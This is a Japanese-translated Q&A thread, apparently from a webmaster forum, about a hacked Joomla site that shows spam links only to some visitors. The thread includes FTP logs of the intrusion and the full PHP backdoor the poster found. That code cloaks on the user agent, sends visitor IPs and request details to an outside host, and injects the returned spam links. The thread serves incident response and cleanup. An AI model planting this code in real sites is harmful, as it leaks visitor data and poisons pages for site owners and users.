web-dev-qa-db-ja.com

サイトを外部で表示したときにマルウェアコードが追加された

下部の2番目のフォローアップを参照してください! (今、実際の悪意のあるコードが追加されています!... ish)


this の質問で促されましたが、大学の学生慈善団体のウェブサイトに、これまで原因を特定できなかった興味深い問題があることに気付きました。 (これがServerFaultの方が良いのではないかとお詫びしますが、サーバー自体には何の問題もないようで、マルウェアの問題はどこかで発生しています!)

彼らのウェブサイト http://duck.dsu.org.uk/ は、ページの下部にポルノ/マルウェア-リンクの完全なロードを持っています(それは this のように見えます) O2ブロードバンド接続から見たときだけだと思います。大学のネットワークまたは別のISP内で表示した場合、下部に何も表示されません。また、当然のことですが、CMS管理ページ内では、テンプレートまたはページのいずれにも表示されません。

私はサーバーが大学のネットワーク内に配置されていないことを99%確信しています。IPを確認しています(「A Small Orange」によってホストされていると考えてください)。この問題を見たのは私だけではありませんが、それが単一の英国のISP、O2ブロードバンド(特定のISPの友人であるTalkTalkが彼に何も表示していないことを確認している)に固有のものかどうかはわかりません。サーバーにハッキングされてページにコードが入力されるという単純なケースではありませんでした。

これを解決するために検討するルートに関するアイデア、これを引き起こしている可能性のあるアイデア、およびその他のアドバイスに感謝します!

ありがとう。


さて、前のfollowupで(ご協力ありがとうございます)、Webホスティング会社にSSHを提供するように説得することができましたアクセス。 .htaccessファイルが変更されていることを発見しました。現在の.htaccessファイルは次のとおりです: link 、これは少なくとも問題の一部であると想定しています。クリーンアップの観点から(前に進む/サイトを再びクリーンにするという観点から)、サーバー全体をワイプして再起動する必要があることはわかっています。

ただし、それは共有ホスティングサーバーであり、サーバー全体を制御できないため、ワイプできません。私はそれがハッキングされていることをウェブホストに指摘しました、そして彼らのアドバイスは:

アカウントは共有ホスティングアカウントですが、アクセスはアカウント自体に限定されます。ユーザーレベルの妥協からサーバー自体に変更を加えることはできません。

サーバー上の何も危険にさらされていないため(自分のアカウントのみ)、提供されたjailshellアクセスは、このアカウントを調査してクリーンアップするのに十分です。

これは本当ですか?適切にクリーンアップできますか?私のサイト(Joomlaなど)で実行されているソフトウェアの脆弱性を利用した場合、はい、それは侵害されたサーバーの私の部分にすぎないと思います。ただし、サーバーが実行しているOSの脆弱性である場合は、明らかに全体が危険にさらされている可能性があります。それを解決する方法はありますか?

以前のリンク:私はすべての this を見、読みました。

...そして今、彼らが何をしたかを示すログを持っています:

Thu Feb 02 14:35:46 2012 0 213.5.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:49 2012 0 213.5.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:53 2012 0 213.5.xxx.xxx 34957 /home/durhamdu/public_html/libraries/joomla/environment/url.php a _ i r durhamdu ftp 1 * c

Mon Apr 09 04:21:53 2012 0 128.127.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:00 2012 0 128.127.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:06 2012 0 128.127.xxx.xxx 1457 /home/durhamdu/public_html/mooving/check.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:09 2012 0 128.127.xxx.xxx 17986 /home/durhamdu/public_html/mooving/laundro.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:18 2012 0 128.127.xxx.xxx 52457 /home/durhamdu/public_html/.htaccess a _ i r durhamdu ftp

参照されたファイルはもうありませんが、リンクはまだ表示されていますが、不審な.htaccessファイルのファイル名を変更しました。うーん...


さて、2回目のフォローアップで、私はあなたの集団的な閲覧のための悪意のあるコードを見つけました:

<?php   
// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $sReferer = '';
    if(isset($_SERVER['HTTP_REFERER']) === true)
    {
        $sReferer = strtolower($_SERVER['HTTP_REFERER']);
    }
    $stCurlHandle = NULL;
    if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_Host']) == true) // Create  bot analitics         
        $stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_Host']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); 
    } else
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_Host']) == true) // Create  bot analitics         
        $stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_Host']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); 
    }
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = curl_exec($stCurlHandle); 
    curl_close($stCurlHandle); 
    echo $sResult; // Statistic code end
?>

私は明らかにそれを削除しました。Joomlaのインストールにパッチを適用しようとしています。皆さんの助けに感謝します! :-)

8
Savara

サーバーは変更されており、アクセスする特定の人々へのリンクを持つページのみを提供するようになっています

これは、ページのGoogleキャッシュを見ると明らかです: http://webcache.googleusercontent.com/search?q=cache:Tey48OeBDBgJ:duck.dsu.org.uk/+&cd=1&hl=ja&ct = clnk&gl = uk スクリーンショットのリンクが表示されます。

これは、Webサイトのユーザーにはリンクが表示されず、検索エンジンに表示されるようにするために使用される一般的な手法です。これは、これらのリンクが SEO攻撃 で使用され、実行者が検索エンジンがリンクを表示することのみを気にするために行われます。

どのような手法を使用しても、誤ってO2ブロードバンドユーザーが検索エンジンボットであると識別され、リンクが表示されているように見えます。

別の可能性としては、ページのリンクが削除されたものの、O2とGoogleの両方がリンクをオンにしたまま、ページのキャッシュバージョンを提供している可能性があります

6
Andy Smith

Webサーバーのような音が危険にさらされている可能性があります。

悪者は卑劣になり始めました。リンクを単純にページに挿入する代わりに、一部の悪意のある人は、特定のユーザーだけがWebページの変更されたバージョンを表示するように調整します。 (Refererヘッダーを使用してこのフィルタリングが実行されることは間違いありませんが、IPアドレスによっても実行されると聞いています。)

サーバーが危険にさらされている場合は、ハッキングから回復する方法についてこのサイトを検索してください。基本的に、「軌道からそれを核」にする必要があります:消去、再フォーマット、最初から再インストール、すべてのソフトウェアを更新、サーバーをロックダウン、古い既知の正常なバックアップからデータを復元して、それを持ってくるだけ公共のインターネットにライブで戻ります。

2
D.W.

私のクライアントの1つがJoomlaのインストールで同じ問題を抱えています。私はそれを次のファイルまで追跡しました:

../public_html/libraries/joomla/environment/url.php

そして

../public_html/templates/THEME_NAME/index.php

Url.phpファイルはダミーファイルなので、削除するだけです。インデックスファイルは少し面倒です。私がしたことは、単にフォルダ内の1つを削除してから、同じテーマの別のインストールから新しいものをアップロードすることでした。ハッキングを行ごとに選択することもできますが、テーマを別の場所で使用した場合は、ハッキングされたサイトに適切なバージョンをコピーしてください。

これは保持されているようですので、それが唯一の被害だったと思います。

このハッキングは、IPアドレスとコンピューターの詳細を電子メールアドレスに送信することを目的としているようです。メールを送信しないでください!

1
Iain

おそらく、ISPにDNSチェンジャーマルウェアがあり、大学のWebサーバーに似た別のWebサイトにユーザーを誘導して、Webサイトを閲覧しようとすると、IPアドレスは184.173.73.180になります。 ..?

0
P3nT3ster

私の娘が所有するウェブサイトでもほぼ同じ問題が見つかりました。

Joomlaベースです。 PHPのページでは、このブログに示されているのとほぼ同じコードが見つかりました。このコードを一時的に削除したため、リンクが表示されなくなりました。

友人が悪意のあるリンクを娘に報告したとき、ハッキングが発覚しました。彼はO2を使用していましたが、リンクを見たことがありませんでした-私たちはVirgin MediaとSkyを使用しています。

Joomlaサイトは、Joomlaを「提供」するRochenによってホストされています。したがって、私たちは自分のサイトのみを制御できます。これは、サイトを維持したくないコンサルタントによって開発されました。

私は35年以上のコンピューティング経験を持っているので参加しました-ウェブサイト、プログラムジェネレーターの作成、コンパイラーの作成、PHPなど)を含みます。

私の他の娘も手伝っています-リーズ大学でコンピューティングの1級を取得しています。

サイトに悪意のあるコードがまだ見つかっていないため、コメントやヒントがあれば歓迎します。

0
The Snail